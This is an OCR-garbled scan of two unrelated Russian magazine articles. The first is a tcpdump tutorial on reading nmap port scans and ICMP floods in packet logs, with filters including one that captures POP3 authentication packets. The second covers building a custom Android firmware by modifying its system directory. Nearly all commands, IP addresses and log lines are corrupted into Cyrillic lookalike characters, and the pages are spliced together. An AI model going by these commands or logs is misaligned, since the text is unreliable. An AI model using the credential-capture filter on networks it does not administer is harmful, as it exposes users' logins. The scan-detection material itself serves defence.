# Іісрсіитр -і ы1ап0 -с 10 -п > 32 апсі 128 

И понимает маски подсетей: 

# Іісрсіитр -і мІапѲ с 10 -п бгс пеі: 192.168.0.0/16 \ 

апсі сі 5І= пеі: 10.0.0.0/8 ог 172.16.0.0/16 

Одна из самых интересных возможностей Есрбитр — это умение 
фильтровать пакеты по наличию определенных битов или байтов 
в заголовках протоколов. Для этого используется следующий 
формат: ргоЫехрпзіге], где ргоЕо — протокол, ехрг — смещение в 
байтах от начала заголовка пакета, а зі іе — необязательное поле, 
указывающее длину рассматриваемых данных (по умолчанию 1 
байт). Например, чтобы отфильтровать только пакеты с установлен- 



ОПЦИИ ТСРОІІМР 



Таблица наиболее интересных и полезных флагов Іісрсіитр: 

• і [интерфейс] — прослушиваемый сетевой интерфейс, для про- 
слушивания всехинтерфейсовследуетуказатьапу. 

• п — не преобразовывать ІР-адреса в 0І\І5-имена. 

• пп — не преобразовыватьІР-адреса и номера портов. 

• X — показыватьсодержимое пакета втекстовом и шестнадцате- 
ричном форматах. 

• XX —тоже самое плюс содержимое ЕЕЬегпеЕ-фрейма. 

• ѵ,-ѵѵ,-ѵѵѵ — увеличить количество отображаемой информации и 
пакетов (больше, еще больше, все). 

• с[п] — показывать только первые п пакетов. 

• 5[П] — количество байт, отображаемых для каждого пакета (мож- 
но уменьшить для удобства чтения или увеличить, чтобы получить 
больше информации). 

• 5 — показывать абсолютные номера ТСР-последовательности 
(ТСРзециепсе питЬегз). 

• е — показыватьзаголовки ЕЕЬегпеЕ-фреймов. 

• ц — показывать меньше информации (для удобства чтения). 

• Е — расшифровать ІРзес-трафи к с помощью у казанного ключа. 



ным флагом 5ѴІ\І (инициация ТСР-рукопожатия), следует использо- 
вать такую запись: 

# Іісрсіитр Чср[13]==2 ' 

Как это работает? Очень просто. Тринадцать байт ТСР-заголовка 
содержат ровно восемь флагов, на каждый из которых приходится 
один бит. Под флаг 5УЫ выделен второй бит. Приведенная запись 
просто проверяет, установлен ли этот бит. Кстати, в более читаемом 
виде эта запись будет выглядеть так: 

# Іісрсіитр ’1=ср[1=срЛа^5] & 1=ср-5уп ! = 0' 



ПРАКТИЧЕСКОЕ ИСПОЛЬЗОВАНИЕ 



Утилиту Арбитр принято использовать для двух целей: отладки 
сети, сетевых приложений и новых протоколов и обучения основам 
ТСР/ІР. Мы пойдем другим путем и воспользуемся возможностями 
Есрбитр, чтобы выявить факты сканирования хоста и проведения 
сетевых атак. 

На рисунке 1 показано, как выглядит в логах Арбитр процедура 
классического ТСР-сканирования портов, осуществляемого с помо- 
щью утилиты птар. Хорошо видно, как птар с адреса 192.168.0.100 



15:49:30714477 ІР 142-160. Й 1№. 59674 > І.Ч7. 1&Ё.Й . ] 1 1 . ГННІЙ : РТагр 151 н тц 136557 ыіп 3779?. прі Иѵш I І 
і€396,мскОК.Г5 ѵаі 94976Ш2 вег В. пор, иве а Іи? 51. 1юк]Ні 0 

1б;49^30. 713425 I Р 192.168.8.111.8388 > 192. 168.8. 138. 69624 : Пад* ЕЙ.1, 8. Аск 1365571003. ыІП 0, ІёпдІИ 0 

15 = 49 ^3®. 713435 ІР 192,168,0.188.54946 > 192. 158. В . 111 .587; Р1в05 Г5Ь 9М) 292197Ж1, ЫІП 92792, врІІ№5 ІЕ 

►Ж.мсМЖ г Т5 ѵві 94970Ш2 ест Й.пор, геса]# 5), ЕвпдІП 9 

15:49:30 719430 ГР 1<*2- 160.0 П 1 -507 > 192 ЛОЙ Я - Гідгр Ек_3, зш] Й, 7921975Й72. ыіп й, ІилгЦй н 
15 = 49 -ЗЯ. 719449 ЕР 192. 168. Ѳ ІЙЙ. 43337 > 192.150.0 111.22= ГІада ей) 2б1№24277, -1г. 32792, дрЦопз ішвв 162 

♦Ж.мскОК.ТЗ Ѵ&1 34976012 есг 0нПорнЫ5с*1е 51- ІепдІИ 3 

15-49-30,71 5457 ІР 192,168,8.111.22 > 192,108.0,108,43337 = Падв 15.1, 5М| 3490707239* ДСк 2618824278, ЫЩ 32708, 

+ орііеэтя I В55 ]бэдо.5аск1Ж Р Т5 ѵаі 94970812 ест 94976812. пор. ыееэіе 5], іепдт 0 

15:49:30.719460 ІР 1ВДЛВД,0 Г 1№ Г 4ЭЭЗ? > 192-160-0 111-22= Наде 1.1. аек 1, иіп 1025. орііогш Ршрр.гхѵ ,Т 5 ѵ й ] 9* 
■976812 кг 94376812]. іёгюШ 8 

15: 49 ;ЭѲ. 719883 ІР 192. 168-8.188. 48887 > 192.168-8.1111.111: РІодэ [51. зэті 4872546885. иіп 32792. орМоге \жа» ІЕ 
+ 395 . 58 СИЖ.Т 8 Ѵві 94976Я12 ест в.пор.МЗСвіе 51. 8 



Рис 1. Классическое ТСР-сканирование 
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ІШІХОШ 



ІбсЗ&ІІВ.&ІІЬЗД ІР №.1ЕаЙ.(*ЛЙ0.4ЙЗД5 > №.1ЬЙ.Н.1П . ГЛЬ: П^уь [&]< ^ ІЬѴЗЗ^ІЗ. у ІИ 4Й96. фі ІОПЬ І №5 14Ё 
і 01 „ ЗепцИі Й 

іьтпьміш ІР 1®ЛЬЙ,И.Ш.Ш > тльэ.в іѳа.405в5: Падв ІР.Ь вед Ѳ р жк 167^9*14, уіп Й р ІепдІМ Й 
15; 30 16,611715 ІР 192 Л 68-^106,40585 > 192,168' 8 Л 11* 8830; РІвдз І5І . Ж| 1679394613, ЫІП 3072, ор^Ішэ Іт 55 1-= 
■6Ѳ1. ІспдМі Ѳ 

16;Эй:16.Ё1і724 ГР ІЮЛЁв.вЛИ -ЙЙЙЙ > I® Лбв.Ѳ . Івв. 405Й5 : Падй ГЕЛ, 5 йч 6. зек 167ЭЭ946І4* УІп Ѳ, Хея&Ъ О 
16-30:16.611738 ІР 192 Л 6В, в Л 0Ѳ.4Ѳ585 X 192 . 168. 0 ЛИ .23: Под* 151 * зд 16793Й4613. уіп №18, орікмів іш*ь 14БЁ 
+1, ІепрІЬ и 

16:30:16.611748 ІР 182- 160-й, 1 11 -23 > 192 Л 68,0- Ш- 46505: Пэдэ (РЛ, эдц Й, ас к І67Й394614, цщ 0, ІегцІЬ Ѳ 
Ш = 30 Л6. 611763 |Р Ш2Л&В,ВЛВ0 Ь 4ЯЖ > I® Д58. В, 111.27- Нздіз 151 * ^ 1679394ЫЭ, Шп 4096. лрІІОИЗ 1*55 14БЕ 
+1. ІепдІИ 8 

16:30:15^11739 ІР Ш2ЛВД.ѲЛ11і22 > 192 ЛЕВ Ѳ Л00.46Ж: Падз 15 Л* 5ед 625029895. зек 1679994614. уіп 32792, 
'Ориона [тав 163361, ІепчШ 0 

16:30Л6.611?98 ІР 1®Л6В.ВЛЙ0.4ѲЬ8& > 192 . 168. Й. 111 .22* Пдаь Шк вед 1679394614. уіп Ѳ р ІепдШ Ѳ 

16:ЗЙ : 1б,61Ш16 |Р 1®Лба.ВЛт.іШН15 > 192 , 168. Й. ШЛИ: Г|,^я [61, вд І679Я9461Д, шіп 1Я74. прі Іппя [р*5 № 

*Ѳ] Р ІелдІІІ Й 



Рис 2. Скрытое БѴМ-сканирование 



пытается установить ТСР-соединение с разными портами, посылая 
БѴІЧ-пакет (Б в поле флагов). Сначала идет проверка порта 8888, 
в ответ на которую приходит РБТ-пакет. Это значит, что порт не 
прослушивается ни одним сервисом. Далее выполняется проверка 
порта 587 с тем же результатом. Наконец, птар посылает 5ѴІ\І-пакет 
на 22-й порт (55Н) и получает ответ в виде пакета 5ѴІЧ-АСК: 

192 .168.0.100. 43337 > 192.168.0.111.22: Р1а^[5 [5]. зед 
2610024277, . . . 

192 Л 68.0 Л 11. 22 > 192 Л 68.0 Л 00. 43337: Р1а%5 [5.]. зед 
3496707239, аск 2610024278, ... 

192.168.0.100.43337 > 192.168.0.111.22: Р1а§5 [.], аск 1, 



Порт открыт, и теперь птар можетуспешно закрыть соединение, 
отправив РБТ-пакет, и перейти к следующим портам. Однако она 
поступает умнее: подтверждает, что приняла АСК-пакет, и сразу 
переходит к следующим портам. Такой способ позволяет обойти не- 
которые системы обнаружения вторжений, но человека, вооружен- 
ного снифером, так просто не проведешь. 

Обрати внимание также на номера перебираемых портов: они не 
генерируется рандомно, а подбираются с учетом наибольшей распро- 
страненности. Это значит, что производится быстрое сканирование, а 
точнее, что птар, скорее всего, запущена вообще без флагов. 

Теперь рассмотрим другой метод обнаружения открытых портов: 
БѴІЧ-сканирование (птар -зБ). Такое сканирование принято назы- 



ТРЮК С ЗАХВАТОМ РТМР-ПОТОКА 



Некоторые веб-сайты, например Іѵ.абоЬе. сот, используютпротокол 
РТМРдля передачи потокового видео. Сохранить та кое видео в файл 
обычными средствами не получится, однакоЩрбштр насспасет. Чтобы 
вычленить из сетевого трафика все ссылки на РТМР- поток, воспользу- 
емся следующей командой: 

# Іісрсіитр -еМі е1:И0 -з 0 -ы - | зіігіп^з | \ 

§гер -ао " гЕтр: // . \+.Яѵ" 

Далеессылки можно скормить утилите гітрбшпр ( ІксІ.пеіМтр ) и по- 
лучить Лѵ-видео нажестком диске: 

$ ./гіітр сіитр -г ' ІІКІ_' -о файл.Пѵ 



вать скрытым, потому что в его процессе ТСР-соединение никогда 
не открывается полностью, а значит, информация о том, что оно 
было установлено, не попадает в логи. Вывод Ісрбштір для такого 
вида сканирования представлен на рисунке 2. Он очень похож на 
лог обычного ТСР-сканирования, однако здесь сканер по-другому 
реагирует на открытые порты: 

192.168.0. 100.48585 > 192.168.0.111.22: Ріа^з [5]. 
зец 1679394613, . . . 

192.168.0. 111.22 > 192.168.0.100.48585: Віа^з [5.]. 
зец 625029896, аск 1679394614, ... 

192.168.0. 100.48585 > 192.168.0.111.22: Р1а§5_[К],_ 
зец 1679394614, . . . 

Видно, что, когда сканер получает подтверждение в виде пакета 
5ѴІЧ-АСК, он не завершаетустановку соединения, а сразу обрывает 
его, чтобы ничего не попало в логи. На рисунке 3 можно видеть ре- 
зультат ІЮР-сканирования. Здесь все очень просто: птар переби- 
рает порты с возможными ІЮР-сервисами, посылая на каждый из 
портов пакет нулевой длины. Если порт закрыт, ОС посылает в ответ 
сообщение ІСМР ипгеасЬаЫе: 

16:41:48.798310 ІР 192.168.0.100.61020 > 

192.168.0.111.18869: ІЮР, 1еп§*Ь 0 
16:41:48.798346 ІР 192.168.0.111 > 192.168.0.100: ІСМР 

192.168.0. 100 ыбр рогі: 18869 ипгеасбаЫе, 1еп§1:1і 36 

В противном случае порт считается открытым. 

Еще один метод сканирования — пиІІ-сканирование, осу- 
ществляемое путем отправки пакетов, не содержащих ни одного 
установленного флага (птар -зІ\І). В зависимости от используемой 
ОС, реакция на такие пакеты может быть разной. Как видно из при- 
веденного листинга, І_іпих в ответ на них посылает РБТ-пакеты: 

192. 168.0. 100. 39132 > 192.168.0.111.256: Ріа^з []. 
міп 3072. Іеп^іііі 0 

192.168.0. 111.256 > 192.168.0.100.39132: Р1а§5 [К.], ... 

При Хтаз-сканировании отсылаются пакеты с установленны- 
ми флагами РІІЧ, ІІРО и РІІ5Н (из-за флагов пакет будто сияет, как 
новогодняя елка): 

192.168.0. 100.35331 > 192.168.0.111.5544: Р1а§5_[ГРІІ] , 
вец 3998959601, міп 4096, иг§ 0, 1еп§1:1і 0 

192. 168. 0. 111. 5544 _> 192.168.0.100.35331: Р1а§5_[К,], 
зец 0, аск 3998959602 

Как видно, реакция на такие пакеты идентична. При АСК- 
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Фильтруй эфир! 



16:41 :4В. 793310 
16:41:48 , 793346 
Іб;4І:48. 79837! 
16:41 : 48.798304 
16: 41: 48. 798400 
16:41:48.790412 
18:41:48,796429 
16:41:48,796441 
16:41 : 40. 798456 
16:41:46.793467 
18:41:48.796403 
16:41=40.790496 
18:41:48 793310 
16 >41 >48, 796522 



ІР 

ГР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 

ІР 



192 /168. В. ШИ. 61820 > 192.1БВ 
192. 166. в. 111 > 192 .163.0, 130 
1 92 ЛБЕ. 8. 106.61020 > 197.168 

192.168.0. 111 > 192,160.0.100 

192.166.0100.61020 > 192.168 

192.168.0. 111 > 192. 160.0. 18Ѳ 

192 . 168. 8.100. 61020 > 192. 1БВ 
192.160.8- 111 > 192.168.0-100 

192.160.0 . 180.61020 > 19Р.І68 

192.160.0. 111 > 192 .163.0.100 

192. 168 . 0 . 103.61020 > 192,163 

192. 160.0. 1 11 > 192. 160, 0.Ш 

192.160.0. 160.61070 > 197.168 
192 г 100,0 .111 > І92.1БВ,0Л00 



0.111 . ІВВБ9 > ЦОР, ІепдІИ 0 
ІСПР 192.166.Ѳ.100 иф рог 1 
0.Ш. 31335: иіКР, ІепдІН 0 
[игг 192,100,0.106 иф рол 
Я ЛИ. ЕЙ9М: І.ШР, ІепдІИ 0 
10№ 192. 163-0-100 иф рог! 
0 Л 11. 541141 ЦОР, Іепдііі 8 
ІСПР 102. 168.0.100 иор рогі 
ЯЛ11.6Э7ІІ Ц№, ГепдІИ О 
ІСПР 192.163.0.100 иф рол 
0 . 1ѲѲ . 198БЭ : ПОР. ІвпдіГі 8 
ІСПР 192. 163. Ѳ 100 иф рогі 
0.111.19504: ЦОР, ЗепдШ в 
ІС№ 192.163.0 - 100 иф РОЛ 



1Ѳ369 ипгеасСгаЫо, ІепдІІі 36 
31335 цпгеаспойіе, Іетцгсп 36 
33919 ипгвасГйЬІе. ІепдІИ 36 
64Ц4 ипгиасГі-аЫе, ІепдІП 36 
6971 упгейсПФІё. іепдіГі ЗБ 
19663 ипгевФаЫе, ІепдІГі 36 
19304 тгевспвЫе, іеггагп 36 



РисЗ. ІЮР-сканирование 



сканировании (-бА) логи Ісрбитр фиксируют отправку множества 
пакетов с установленным флагом АСК и отправку в ответ на них 
пакетов Р5Т. Однако, если в системе установлен брандмауэр, 
ответных сообщений приходить не будет, и птар сможет понять, 
фильтруется ли порт. С помощью Ісрбитр можно также отследить и 
различные виды флуда, например, классический ІСМР-флуд будет 
выглядеть в логах следующим образом: 



16:43:06.008305 ІР 192.168.0.100 
іѵре-#68. Іеп^Іі 1032 


> 


192.168.0.111: 


ІСМР 


16:43:06.008383 ІР 192.168.0.100 
1:уре-#34 л 1еп§1:1і 1032 


> 


192.168.0.111: 


ІСМР 


16:43:06.008714 ІР 192.168.0.100 


> 


192.168.0.111: 


ІСМР 


1:ѵое-#183. Іепеѣіі 1032 


16:43:06.008831 ІР 192.168.0.100 


> 


192.168.0.111: 


ІСМР 



і:уре-#192, 1еп§-Ыі 1032 

Особую важность здесь имеет поле, в котором указано время, 
когда был принят пакет. Ни одно нормальное приложение не будет 
слать множество ІСМР-сообщений в течение одной тысячной секун- 
ды. Другие виды флуда (например, 5ѴІ\І) выявляются точно таким же 
образом. 



ВЗАИМОДЕЙСТВИЕ С ДРУГИМИ ПРОГРАММАМИ 



Одно из самых важных достоинств Арбитр заключается в том, что 
формат его отчетов за время существования программы фактиче- 
ски стал стандартом для всех сниферов, и сегодня его понимают 
все более или менее серьезные инструменты анализа трафика. 
Например, Ісрбитр можно использовать для генерации дампа на 
удаленной машине, а затем отправить его на локальную и провести 
анализ с помощью ѴѴігезЬагк: 

$ 55Іі гоо1:@ехатр1е. пи ѣсрбитр -ѵі - 'рогі: ! 22 ' А 
| ыігевііагк -к -і - 

Здесь мы использовали опцию ’-ѵѵ -' для записи дампа в стан- 
дартный вывод и перенаправили его анализатору ѴѴігезЬагк, рабо- 
тающему на локальной машине. Таким же образом можно провести 
анализ трафика с помощью 5пог1: 

$ ббіі гоо1і(8)ехатр1е. ги 'Чсрбитр -пп -і е1:Ы -ы \ 

| 5пог1: -с /ѳііс/бпогіі/бпогіі.соп-Р -г - 

Перенаправив вывод программы на вход дгер, можно выявить 
различные проблемы в работе сети, например найти пакеты с не- 
правильной контрольной суммой: 

# Тср бит р -ппѵѵ -г битр.сар Тер | \ 

§гер -ѵ "Тер з ит ок" | ыс -1 




Запрос к доодіе.сот в логах Ісрсіитр 



АДМИНСКИЕ ШТУЧКИ 



Фильтрацию пакетов по данным, содержащимся в заголовке, 
которую мы рассмотрели в начале первого раздела, очень удобно 
использовать для отладки различных протоколов и поиска сетевых 
проблем. Например, мы можем применить ее для отлова сетевых 
пакетов, передаваемых по протоколу Сібсо Оізсоѵегу РгоТосоІ, с 
помощью которого маршрутизаторы Сібсо обмениваются информа- 
цией о топологии и состоянии сети: 

# Тсрбитр -пп -ѵ -і е ТбѲ -б 1500 -с 1 \ 

' еТбег [20: 2] == 0x2000' 

Таким же образом можно отловить все пакеты, передаваемые 
по протоколу йНСР (0І5С0ѴЕР, РЕСШЕ5Т, ІЫЕОРМ), чтобы выявить 
проблемы подключения клиентов: 

# ісрбитр -і е1:1і0 -ѵѵѵ -б 1500 '((рогі: 67 ог \ 

рогі: 68) апб (ибр[8:1] = Ѳхі))' 

Или поймать пакеты, передаваемые при РОРЗ-аутентификации: 

# ісрбитр -і е1:ІіѲ "1:ср рогі: рорЗ апб ір[4Ѳ] = 85 \ 

апб ±р [41 ] = 83" -5 1500 -п 



выводы 



В руках знающего пользователя Ісрбитр превращается в мощней- 
ший инструмент, который можно использовать не только для от- 
ладки, но и для исследования аномалий. Богатый набор операторов 
и флагов позволяет вытащить из сетевого эфира и исследовать то, 
что действительно нужно. ПЕ 
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Любой пользователь АпсІгоісІ 
имеет свое представление о 
том, как должна выглядеть 
операционная система, 
какие функции выполнять 
и какой набор ПО в ней 
должен быть установлен по 
умолчанию. Однако далеко 
не все знают, что создать 
собственную прошивку не так 
уж сложно. Для этого совсем 
не обязательно разбираться 
в ядре Ыпих, уметь 
компилировать исходники 
АпсІгоісІ или понимать, как 
устроен смартфон. 



ІѴІѴІѴІ 



аоо.аІ/ІІНКо — 

набор советов 
по изменению 
ігатеѵѵогк-геБ.арк. 



аоо.аІ/ГГѵ28 — 

простая анимация 
загрузки с 
логотипом АпсІгоісІ. 



аоо.аІ/УаІіХ — 

анимация загрузки с 
плазменным кругом. 



аоо^ді/Рб-ІВ — 

анимация загрузки в 
стиле ІВМ РС. 



аоо.аІ/абХѵѵа — 

анимация загрузки 
АпсІгоісІ НопеусотЬ. 



ВВЕДЕНИЕ 




Существуеттри способа создания собственной прошивки для 
АпсІгоісІ- коммун и каюра: 

1. Допили ван ие и компиляция операционной системы из исходни- 
ков, публикуемых компанией Ооодіе или командой СуаподепМоб. 

2. Модификация стоковой прошивки коммуникатора. 

3. Модификация сторонней прошивки, созданной с помощью 
первого или второго способа. 



Первый способ является наиболее правильным и гибким, 
однако он зачастую требует достаточно глубоких знаний об особен- 
ностях АпсІгоісІ и умения редактировать исходники системы так, 
чтобы они после этого работали на устройстве. Эта тема выходит 
за рамки нашей статьи, поэтому сборку исходников АпсІгоісІ мы 
рассматривать не будем, а остановимся на двух других способах, 
точнее на третьем. 

Сторонние прошивки (так называемые моды) существуют практи- 
чески для любого Апбгоіб-устройства, с момента выхода которого на 
рынок прошла хотя бы неделя. Обычно они уже включают в себя все 
необходимые модификации, необходимые для корректной работы 
прошивки на коммуникаторе, а потому представляют собой отличную 
площадку для экспериментов над системой. Их можно модифициро- 
вать практически до неузнаваемости, включать в состав ОС любое 
ПО, изменять ее внешний облик, создавать множество низкоуровне- 
вых настроек с помощью простого текстового редактора и файлового 
менеджера. Эти действия не требуют глубоких знаний ОС и могут быть 
выполнены любым читателем журнала. 
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Моды анимации загрузки с хсіа-сіеѵеіорегз 



ВЫБИРАЕМ ПОДОПЫТНОГО 



Итак, предположим, что наш коммуникатор уже зарутован 
и в загрузочную область записана консоль восстановления 
СІоскѵѵогкМосІ, позволяющая устанавливать на аппарат любые про- 
шивки без всяких ограничений (о том, как это сделать, мы писали 
в статье «Тотальное подчинение», опубликованной в октябрьском 
номере ][). Теперь мы хотим установить на устройство другую 
прошивку, да не абы какую, а с собственными модификациями, 
настройками и набором ПО. Поэтому нам нужен каркас, а именно 
чужая прошивка, стабильно работающая на нашем устройстве. Где 
ее взять? 

Главное место обитания всех ромоделов — это, конечно же, 
форумы хсіа-сіеѵеіорегз. сот. Там можно найти все что угодно для 
коммуникаторов, работающих под управлением Ю5, ѴѴіпсІоѵѵз 
МоЬіІе, ѴѴіпсІоѵѵз РЬопе и АпсІгоісІ. Открываем сайт в браузере, 
жмем на раздел Рогштіз и ищем в списках форумов свой ком- 
муникатор. Далее заходим в соответствующий раздел АпсІгоісІ 
Оеѵеіортепі и внимательно просматриваем списоктем, содер- 
жащих в названии слово «[РОМ]». Лучше найти какую-нибудь 
чистую прошивку с названием вроде «Риге АпсІгоісІ 2.3 Рот» или 
порт СуаподепМоб, хотя, в сущности, подойдет и любая другая 
(правда, возможно, придется отменять авторские изменения). От- 
крываем тему, проматываем первый пост, находим где-то в конце 
ссылку на скачивание и загружаем РОМ на свой комп. 

Теперь файл прошивки нужно вскрыть. Делается это с помощью 
самого обычного ипгір: 

$ тксііг ~/гот^ссІ ~/гот 
$ ипіір . . /путь/до/прошивки . гі р 



три обязательных объекта: М Е Т А - 1 N Р, файл ЬооПітд и директо- 
рия зузіет. 

Первый каталог содержит метаинформацию о прошивке, 
включая файлы сертификатов автора, манифест со списком 
файлов и их контрольными суммами, а также скрипт обновления, 
который может создавать в І\ІАІ\Ю-памяти новые файлы, менять 
права доступа и выводить прогресс-бар, который видят пользо- 
ватели во время установки прошивки. 

Файл Ьооі.ітд содержит загрузочный образ, который вклю- 
чает в себя ядро Ыпих и образ іпіігсі. Его можно распаковать, 
однако для нас он не несет особой пользы, так как почти любые 
системные параметры можно изменить с помощью файлов на- 
строек и файловой системы /ргос. Если же тебе требуется ядро, 
собранное с особыми параметрами, например с активированным 
планировщиком ВЕБ или поддержкой І\ІР5, то почти наверняка 
его можно найти на том же хсіа-сіеѵеіорегз и прошить с помощью 
СІоскѵѵогкМосІ. 

Наконец, каталог зузіет — это то, ради чего все и затевалось. 
Содержимое этого каталога и представляет собой операционную 
систему АпсІгоісІ без ядра Ыпих. Он содержит все, что нужно для 
работы ОС, а потому знать его структуру просто необходимо. Вы- 
глядит она так: 

• арр — предустановленные приложения: телефон, калькулятор, 
календарь ит. д. 

• Ьіп — а налог каталогов /Ып и/изг/Ып в Ыпих. Содержит различ- 
ные системные компоненты, используемые более высокоуров- 
невыми компонентами системы. Например, именно здесь лежит 
виртуальная машина сіаіѵікѵт. 

• еіс — файлы настроек. Полный аналог/еіс в Ыпих, используе- 
мый, однако, только системными компонентами. Приложения 
АпсІгоісІ хранят настройки в каталоге /баіа/сіаіа. 

• іопіб — шрифты. По умолчанию содержит только фирменные 
шрифты ОгоісІ (или РоЬоІо в АпсІгоісІ 4.0). 

• ігатеѵѵогк — наборы Заѵа-классов, используемые системой и 
АпсІгоісІ -софтом. Тут же л ежит файл ітатеѵѵогк-гез.арк, содер- 
жащий полное описание интерфейса операционной системы, 
включая все графические файлы. 

• пь — и пих-библиотеки, используемые низкоуровневыми 
компонентами системы. Аналог каталогов /ІіЬ и /изг/ПЬ в І_іпих, 
включает та кие стандартные библиотеки, какПЬс (правда, 
АпсІгоісІ использует собственную Віопіс вместо БІіЬс), ІіЬг (де- 
шифрование), ІіЬззІ и другие. 

• тесііа — медиафайлы: рингтоны, звуки уведомлений, звуки 
интерфейса и файлы анимации загрузки ОС. 

• 1І5 — файлы, необходимые для работы синтезатора речи. 

• ІІ5Г — необязательный каталог, который обычно содержит фай- 
лы, необходимые для работы софтин из каталога Ьіп. По сути, 
аналог/изг/зЬаге. 

• ѵепсіог— файлы, поставляемые производителем аппарата. 
Обычно содержит бинарную Пгтѵѵаге для различных «желез- 
ных» компонентов, например модуля ѴѴі-Рі. 

• хЬіп — необязательный каталог, который содержитвсе, что не 
вошло в Ьіп. Какправило, используется для хранения полезных 
утилит, тем не менее необязательных для работы системы (іор, 
текстовый редактор). СуаподепМоб использует его для хране- 
ния инструментов администрирования: ЬазЬ, ззЬ, роѵѵегіор, 
ЬизуЬох ит. д. 

• ЬиіШ.ргор — файл, содержащий информацию о сборке, а также 
различные низкоуровневые настройки. 




ОБЩАЯ СТРУКТУРА КАТАЛОГОВ И ВАЖНЫЕ ФАЙЛЫ 



Набор файлов и каталогов, образовавшийся в результате вы- 
полнения предыдущей команды, и есть, в сущности, операци- 
онная система АпсІгоісІ, причем ровно в том виде, в каком она 
будет размещена в І\ІАІ\Ю-памяти устройства. В зависимости от 
версии АпсІгоісІ и фантазии автора, она может содержать разные 
наборы каталогов и файлов, однако в ней всегда присутствуют 



СОБСТВЕННЫЙ НАБОР ПО 



Каталог/зузіет/арр содержит все предустановленное в прошивку 
ПО. Удаляя и добавляя пакеты в этот каталог, мы можем изменить 
набор приложений, доступных «из коробки». Например, ни для 
кого не секрет, что стандартный ланчер АпсІгоісІ (да и АйѴѴІ_аипсЬег 
в СуаподепМосІ) тормозит и имеет многочисленные недостатки. ОК, 
заменим его на ЬаипсЬегРго ( ѵѵѵѵѵѵ.ІаипсЬегрго.сот ): 




л. 







( 
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$ гт зуз1:ет/арр/І_аипсІіег.арк 




$ м§е1: §оо.§1/1)9с54 -о зѵзІгет/арр/І-аипсІіегРго. арк 



КОМАНДА 5ЕТРР0Р 



И это все. Не надо ничего устанавливать, не надо нигде ковы- 
ряться, просто закидываем нужное приложение в каталог — и 
готово. Даже имя не имеет значения, АпсігоісІ сам найдет нужное 
приложение и установит его в качестве домашнего экрана. Таким 
же образом можно поместить в прошивку любую другую програм- 
му или удалить ее оттуда. 

Полезно поместить в прошивку одно из приложений для по- 
иска утерянного смартфона (например, ргеу), тогда даже в случае 
сброса до заводских настроек оно останется в ОС и будет рабо- 
тать. Также можно заменить некоторое системное ПО, например 
добавить Оіаіег Опе вместо стандартного Рбопе.арк или Оо 5М5 
вместо зтз.арк. 

Как насчет системных Ыпих-приложений, например ззЬ- 
сервера или тс? Здесьтоже все просто. Собрать софтинудля 
АпсігоісІ и процессора АРМ можно с помощью комплекта І\ЮК 
от Ооодіе, но большинство нужных приложений уже собрано до 
нас. Например, мы хотим предустановить тс в свою прошивку. 
Идем на хба-беѵеіорегз и выполняем поиск по запросу МібпідЫ 
Соттапбег. На первой же странице находим арк-пакет с установ- 
щиком ( аоо.аІ/РахІН ) и распаковываем его с помощью все того же 
ипгір: 

$ сб /Хтр; ипіір ~/ІМа1:іѵпихІп5І:а11е г_1 Л . арк 

Видим в списке распакованных файлов аз5еІ5/кіІз/тс-4. 7.5.4- 
агтТагдеС Это архив Іаг.дг, который распаковывается в корень 
системы после установки арк-пакета (а точнее, после установки 
арк, запуска приложения и нажатия кнопки ІпзІаІІ). Мы можем 
сразу распаковать его в нашу прошивку и получить предустанов- 
ленный тс: 

$ сб ~/гот 

$ 1:ап -Х2-Р /1:тр/а55е1:5/кі1:5/тс-4.7.5.4-агт.1:аг.іе1: 

Теперь для запуска файлового менеджера на устройстве до- 
статочно открыть терминал и набрать тс. Другие приложения 
могут распространяться в гір-архивах для прошивки с помощью 
СІоскѵѵогкМоб Ресоѵегу. Поместить их в свой мод еще проще, для 
этого достаточно перейти в корень прошивки (в данном случае 
~/гот) и распаковать архив с помощью ипгір. 



Приведенные в статье настройки Ьиііб.ргор можно применить и в 
уже работающей системе с помощью команды зеіргор: 

# зеііргор беЬи§. з^. поЬооІіапіітіаІііоп 1 



Каталоги Іауоиі содержат описания графических элемен- 
тов в формате ХМІ_ (на самом деле они хранятся в бинарном 
формате АХМІ_, но аркіооі преобразовал их в обычный ХМІ_). 
Формат описания достаточно прост и понятен, но с наскоку с ним 
разобраться трудно, особенно если не знать, где что находит- 
ся. Поэтому мы снова обратимся к услугам обитателей форума 
хба-беѵеіорегз, которые уже успели придумать массу различных 
модификаций для графического интерфейса Апбгоіб. Их легко 
найти с помощью поискового запроса «Ітатеѵѵогк-гез тоб 
имя_устройства». 

Обычно такие моды распространяются в виде готового файла 
Ітатеѵѵогк-гез. арк, который можно просто положить в свою про- 
шивку. Если же ты хочешь найти конкретные отличия в содержи- 
мом, то мод можно распаковать и сравнить с твоим Ітатеѵѵогк-гез 
с помощью біІЧ: 

$ бі-Р-Р -К ~/-Ргатеѵѵогк-гез \ 

^/гот/зуз1:ет/-Ргатеыогк/-Ргатеыопк-пе5 

К сожалению, в рамках одной статьи мы не можем рассмотреть 
хотя бы часть внутреннего устройства Ітатеѵѵогк-гез, поэтому за 
более подробной информацией обращайся к соответствующей 
теме форума 4РйА: доо.діАіНРо . 

После внесения модификаций можно собрать Ітатеѵѵогк-гез. арк 
с помощью все того же аркіооі. Однако для этой операции требуется 
утилита аарі из комплекта Апбгоіб 5йК, которую аркіооі использует 
для окончательной упаковки арк-файла. Ее можно получить и от- 
дельно: 

$ сб ~/Ып; ѵѵ^еі: §оо. §1/1:С7к8 




ВНЕШНИЙ ОБЛИК 



Теперь можно собрать файл: 



Собственную прошивку чаще всего создают для того, чтобы 
изменить внешний облик Апбгоіб по своему вкусу. Проделать 
эту операцию в Апбгоіб, опять же, очень просто. Все настройки 
графического интерфейса Апбгоіб хранятся в файле Ітатеѵѵогк/ 
Ітатеѵѵогк-гез. арк. Его можно распаковать с помощью утилиты 
аркіооі: 

$ сб м§е1: §оо. §1/6x251 
$ Ха г -хд-р арк1:оо11.4. 1.ііаг . Ьг2 
$ сб ~/гот/зѵз1:ет/-Ргатеѵѵогк 
$ даѵа -даг ~/арк1:оо1.да г ' б Тгатеыогк-гез .арк 



$ сб ~/гот/5у5~Еет/Тгатеіл/огк 
$ іаѵа -таг ~/арк1:оо1 . іаг Ь -Ргатемогк-гез 
$ ср Тгатыогк-гез/біз1:/-Ргатеыогк-ге5 . арк . 
$ гт -г Р Тгатеыогк-гез 




ШИК 



Следующий этап — это изменение анимации загрузки. Она хра- 
нится в виде обычных рпд-файлов, упакованных в архив зузіет/ 
тебіа/ЬооІапітаІіоп.гір. Распакуем его: 




